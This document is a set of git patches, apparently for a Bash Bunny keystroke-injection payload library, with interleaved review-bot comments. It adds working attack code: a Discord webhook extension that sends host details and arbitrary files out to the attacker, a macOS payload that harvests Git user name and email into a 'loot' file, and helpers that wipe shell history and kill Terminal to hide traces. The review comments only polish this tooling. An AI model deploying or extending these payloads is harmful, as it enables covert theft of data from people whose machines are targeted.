From 971a981c9f96971809063cd255e5542667ab6ed3 Mon Sep 17 00:00:00 2001
From: quentinlamamy
Date: Mon, 31 Jul 2023 18:56:30 +0200
Subject: [PATCH 1/3] Submit Discorde exfiltration extension
---
 payloads/extensions/discord.sh | 86 ++++++++++++++++++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100755 payloads/extensions/discord.sh
diff --git a/payloads/extensions/discord.sh b/payloads/extensions/discord.sh
new file mode 100755
index 000000000..c5c96e326
--- /dev/null
+++ b/payloads/extensions/discord.sh
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title: Discord Extension
+# Description: Interact with discord webhook to exfiltrate text or files
+# Author: quentin_lamamy
+# Version: 1.0
+# Category: Extension
+#
+# To use this extension, you need to create a webhook on discord and get the webhook id and token
+# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
+# DISCORD_WEBHOOK_ID="""
+# DISCORD_WEBHOOK_TOKEN=""
+
+function DISCORD() {
+
+ case $1 in
+
+ # @desc Initialize the exfiltration session by posting an embed message on discord with host information
+ # @usage DISCORD INIT
+ # @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
+ "INIT")
+
+ curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
+ curl_header="Content-Type: application/json"
+
+ Q STRING "printf '\e7'"
+ Q ENTER
+ Q STRING "curl --location '$curl_location'"
+ Q STRING " --header '$curl_header'"
+ Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
+ Q STRING "'\${BB_HOST_OS}'"
+ Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+ Q STRING "'\${BB_HOST_IP_V4}'"
+ Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+ Q STRING "'\${BB_HOST_IP_V6}'"
+ Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
+ Q STRING "'\${BB_HOST_USER}'"
+ Q STRING "\",\"inline\":true}]"
+ Q STRING "}]}'"
+ Q ENTER
+ Q STRING "printf '\e8\e[1A\e[0J'"
+ Q ENTER
+
+ ;;
+
+ "SEND")
+
+ case $2 in
+
+ # @desc Send a message to discord via webhook
+ # @usage DISCORD SEND MSG $yourMessage
+ "MSG")
+
+ if [[ "$3" == *"$"* ]]; then
+ message="'$3'"
+ else
+ message=$3
+ fi
+
+ Q STRING "printf '\e7'"
+ Q ENTER
+ Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
+ Q ENTER
+ Q STRING "printf '\e8\e[1A\e[0J'"
+ Q ENTER
+ ;;
+
+ # @desc Send a file to discord via webhook
+ # @usage DISCORD SEND FILE $yourFilePath
+ "FILE")
+ Q STRING "printf '\e7'"
+ Q ENTER
+ Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
+ Q ENTER
+ Q STRING "printf '\e8\e[1A\e[0J'"
+ Q ENTER
+ ;;
+
+ esac
+
+ ;;
+
+ esac
+}
+
+export -f DISCORD
\ No newline at end of file
From 5cfae30936462e81e678ec4f6d83acb6a883e464 Mon Sep 17 00:00:00 2001
From: quentinlamamy
Date: Sun, 20 Aug 2023 12:06:24 +0200
Subject: [PATCH 2/3] Add github information exfiltration payload
---
 .../exfiltration/githubExfiltration/README.md | 30 ++++++++++
 .../githubExfiltration/payload.txt | 58 +++++++++++++++++++
 2 files changed, 88 insertions(+)
 create mode 100644 payloads/library/exfiltration/githubExfiltration/README.md
 create mode 100755 payloads/library/exfiltration/githubExfiltration/payload.txt
diff --git a/payloads/library/exfiltration/githubExfiltration/README.md b/payloads/library/exfiltration/githubExfiltration/README.md
new file mode 100644
index 000000000..63162238f
--- /dev/null
+++ b/payloads/library/exfiltration/githubExfiltration/README.md
@@ -0,0 +1,30 @@
+
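Review bot: `curl_location`, `curl_header` and `message` are assigned inside `DISCORD()` without `local`, so every call leaves them behind as globals in whatever shell sourced the extension (and, since the function is `export -f`ed, in any child bash that inherits it); declare them once at the top of the function with `local curl_location curl_header message`. The setup comment in the header has a stray third quote, `# DISCORD_WEBHOOK_ID="""`, and should read `# DISCORD_WEBHOOK_ID=""` to match the `DISCORD_WEBHOOK_TOKEN` line under it. `DISCORD()` begins and ends inside this hunk.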
+ +# Github Information Exfiltration +**Get Git user name and email from the Git global config and exfiltrate them** + +![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white) +![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white) + +![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black) + +
+ +banner + +# Dependency + +* OSX Extension by quentin_lamamy + +# Changelog +v1.0 : +* :tada: Release on 2023/08/20 + +# Contributing +A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues) + +# License +

Github Infos Exfiltration Payload by Quentin Lamamy is licensed under CC BY-NC-SA 4.0

+
+# Support
+Buy Me A Coffee
diff --git a/payloads/library/exfiltration/githubExfiltration/payload.txt b/payloads/library/exfiltration/githubExfiltration/payload.txt
new file mode 100755
index 000000000..bce2553ec
--- /dev/null
+++ b/payloads/library/exfiltration/githubExfiltration/payload.txt
@@ -0,0 +1,58 @@
+#!/bin/bash
+#
+# Title: OSX Payload to exfiltrate Git user name and email
+# Description: Get Git user name and email from the Git global config and exfiltrate them
+# Author: quentin_lamamy
+# Version: 1.0
+# Category: Exfiltration
+# Attackmodes: HID STORAGE
+# Target OS: OSX
+# Dependency: OSX Extensions
+#
+# Magenta solid Setup
+# Yellow single blink Attack in progress
+# Yellow double blink Sync
+# Yellow triple blink Cleanup
+# Green blink then solid Finished
+
+LED SETUP
+
+ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
+
+OSX TERMINAL OPEN
+
+Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
+Q ENTER
+Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
+Q ENTER
+Q STRING 'touch $lootPath'
+Q ENTER
+
+LED ATTACK
+
+# Get the user name from the Git global config
+Q STRING 'user_name=$(git config --global user.name)'
+Q ENTER
+
+# Get the user email from the Git global config
+Q STRING 'user_email=$(git config --global user.email)'
+Q ENTER
+
+Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
+Q ENTER
+
+# Sync
+LED STAGE 2
+sync
+
+# Cleanup
+LED STAGE 3
+
+# Eject
+QUACK STRING 'diskutil eject $last_mounted_volume'
+QUACK ENTER
+DELAY 100
+
+OSX TERMINAL CLOSE
+
+LED FINISH
\ No newline at end of file
From 5ce34d68190ce89ad4e8de982e866f9d839ba5e4 Mon Sep 17 00:00:00 2001
From: Quentin Lamamy
Date: Mon, 2 Sep 2024 04:38:47 +0200
Subject: [PATCH 3/3] Update OSX Extension
---
 payloads/extensions/osx.sh | 278 +++++++++++++++++++++++++++++++++++++
 1 file changed, 278 insertions(+)
 create mode 100755 payloads/extensions/osx.sh
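Review bot: The eject step at the bottom switches to `QUACK STRING 'diskutil eject $last_mounted_volume'` / `QUACK ENTER` while every other keystroke line in this payload uses the `Q` short form; the two spellings name the same command, so use one throughout, `Q STRING 'diskutil eject $last_mounted_volume'` and `Q ENTER`. The `# Sync` and `# Cleanup` comments would carry more information if they repeated the LED legend from the header, e.g. `# Sync (yellow double blink)` and `# Cleanup (yellow triple blink)`, so a reader of the body does not have to scroll up to map `LED STAGE 2` and `LED STAGE 3` to a colour.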
diff --git a/payloads/extensions/osx.sh b/payloads/extensions/osx.sh
new file mode 100755
index 000000000..304a59f27
--- /dev/null
+++ b/payloads/extensions/osx.sh
@@ -0,0 +1,278 @@
+#!/bin/bash
+#
+# Title: OSX Extension
+# Description: Allow a bunch of osx interaction
+# Author: quentin_lamamy
+# Version: 2.0
+# Category: Extension
+
+function OSX() {
+
+ case $1 in
+
+ "TERMINAL")
+
+ case $2 in
+
+ # @desc Open a terminal
+ # @usage OSX TERMINAL OPEN
+ "OPEN")
+ Q GUI SPACE
+ Q STRING terminal
+ Q ENTER
+ ;;
+
+ # @desc Initialize the terminal
+ # Make the PS1 nicer (just because I like it)
+ # Grab Host information and store it in BB_OSX vars
+ # @usage OSX TERMINAL INIT
+ # @info This command need a focused terminal
+ "INIT")
+
+ Q STRING "bash"
+ Q ENTER
+ Q STRING "clear"
+ Q ENTER
+ Q STRING "printf '\e7'"
+ Q ENTER
+ Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
+ Q ENTER
+ Q STRING 'BB_HOST_USER=$(whoami)'
+ Q ENTER
+
+ Q STRING 'BB_HOST_NAME=$(hostname)'
+ Q ENTER
+
+ Q STRING "BB_HOST_OS='OSX'"
+ Q ENTER
+
+ Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
+ Q ENTER
+
+ Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
+ Q ENTER
+
+ Q STRING "printf '\e8\e[1A\e[0J'"
+ Q ENTER
+
+ ;;
+
+ # @desc Minimize the terminal
+ # @usage OSX TERMINAL MINIMIZE
+ # @info This command need a focused terminal
+ "MINIMIZE")
+ Q STRING 'printf \e[2t'
+ Q ENTER
+ ;;
+
+ # @desc Resize the focused terminal
+ # @usage OSX TERMINAL RESIZE $width $height
+ # @param $width The terminal width
+ # @param $height The terminal height
+ # @info This command need a focused terminal
+ "RESIZE")
+ Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
+ Q ENTER
+ ;;
+
+ # @desc Clear the focused terminal
+ # @usage OSX TERMINAL ZOOM
+ # @info This command need a focused terminal
+ "CLEAR")
+ Q STRING clear
+ Q ENTER
+ ;;
+
+ # @desc Close all terminal
+ # @usage OSX TERMINAL CLOSE
+ # @info This command need a focused terminal
+ "CLOSE")
+ Q STRING history -c
+ Q ENTER
+ Q STRING killall Terminal
+ Q ENTER
+ ;;
+
+ # @desc Change terminal window name
+ # @usage OSX TERMINAL NAME
+ # @info This command need a focused terminal
+ "NAME")
+ Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
+ Q ENTER
+ ;;
+
+ esac
+
+ ;;
+
+ "NETWORK")
+
+ case $2 in
+
+ "WIFI")
+
+ case $3 in
+
+ # @desc Enable wifi
+ # @usage OSX NETWORK WIFI ENABLE
+ "ENABLE")
+ Q STRING "networksetup -setairportpower en0 on"
+ Q ENTER
+ ;;
+
+ # @desc Disable wifi
+ # @usage OSX NETWORK WIFI DISABLE
+ "DISABLE")
+ Q STRING "networksetup -setairportpower en0 off"
+ Q ENTER
+ ;;
+
+ # @desc Connect to a wifi network
+ # @usage OSX NETWORK CONNECT $ssid $password
+ # @arg Wifi SSID
+ # @arg Wifi Password
+ "CONNECT")
+ Q STRING "networksetup -setairportnetwork en0 $4 $5"
+ Q ENTER
+ ;;
+
+ esac
+
+ ;;
+
+ "ETHERNET")
+ ;;
+
+ esac
+ ;;
+
+ "SESSION")
+
+ case $2 in
+
+ # @desc Shutdown the computer
+ # @usage OSX SESSION SHUTDOWN
+ "SHUTDOWN")
+ Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
+ Q ENTER
+ ;;
+
+ # @desc Restart the computer
+ # @usage OSX SESSION RESTART
+ "RESTART")
+ Q STRING "osascript -e 'tell app \"System Events\" to restart'"
+ Q ENTER
+ ;;
+
+ # @desc Lock the computer
+ # @usage OSX SESSION LOCK
+ "LOCK")
+ Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
+ Q ENTER
+ ;;
+
+ # @desc Logout current session
+ # @usage OSX SESSION LOGOUT
+ "LOGOUT")
+ Q STRING "osascript -e 'tell app \"System Events\" to log out'"
+ Q ENTER
+ ;;
+
+ "GET_USER")
+ #Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
+ Q STRING 'BB_OSX_USER=$(whoami)'
+ Q ENTER
+ ;;
+
+ esac
+
+ ;;
+
+ "SOUND")
+
+ case $2 in
+
+ "PLAY")
+ Q STRING "afplay $3"
+ ;;
+
+ # @desc Change the computer volume
+ # @usage OSX MISC VOLUME $volumeValue
+ # @arg An integer between 0 and 10
+ "VOLUME")
+ Q STRING "osascript -e 'set Volume $3'"
+ Q ENTER
+ ;;
+
+ esac
+ ;;
+
+ "NOTIFICATION")
+
+ case $2 in
+
+ "CLEAR")
+ Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
+ Q ENTER
+ ;;
+
+ "DISPLAY")
+
+ if [ -z $6]; then
+ $6=${1:-"Purr"}
+ fi
+
+ Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
+ Q ENTER
+ ;;
+
+ esac
+
+
+ ;;
+
+ "MISC")
+
+ case $2 in
+
+ # @desc Show or hide desktop icon
+ # @usage OSX MISC DESKTOP_ICON $action
+ # @arg HIDE | void
+ "DESKTOP_ICON")
+ if [ $3 == "HIDE" ]; then
+ Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
+ Q ENTER
+ else
+ Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
+ Q ENTER
+ fi
+ ;;
+
+ # @desc Change wallpaper with the specified url image
+ # @usage OSX MISC WALLPAPER_URL
+ "WALLPAPER_URL")
+ Q STRING "cd ~/Desktop"
+ Q ENTER
+ Q STRING "curl $3 > img.bb"
+ Q ENTER
+ Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
+ Q ENTER
+ ;;
+
+ # @desc Say something in the way of bigben
+ # @usage OSX MISC SAY
+ # @info Need a focused terminal
+ "SAY")
+ Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
+ Q ENTER
+ ;;
+
+ esac
+
+ ;;
+
+ esac
+
+}
+
+export -f OSX
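Review bot: The `DISPLAY` branch under `NOTIFICATION` cannot apply its default sound: `if [ -z $6]; then` has no space before `]`, and `$6=${1:-"Purr"}` is not an assignment in bash (positional parameters cannot be assigned with `=`, and `$1` at that point is `NOTIFICATION`, not a sound name), so bash expands the line to `=NOTIFICATION` and tries to run it as a command. Replace the three-line `if` block with `local sound=${6:-Purr}` and use `sound name \"$sound\"` in the `osascript` line that follows it. Separately, the `CLEAR` case under `TERMINAL` is documented as `# @usage OSX TERMINAL ZOOM`; it should read `# @usage OSX TERMINAL CLEAR`. `OSX()` begins and ends inside this hunk.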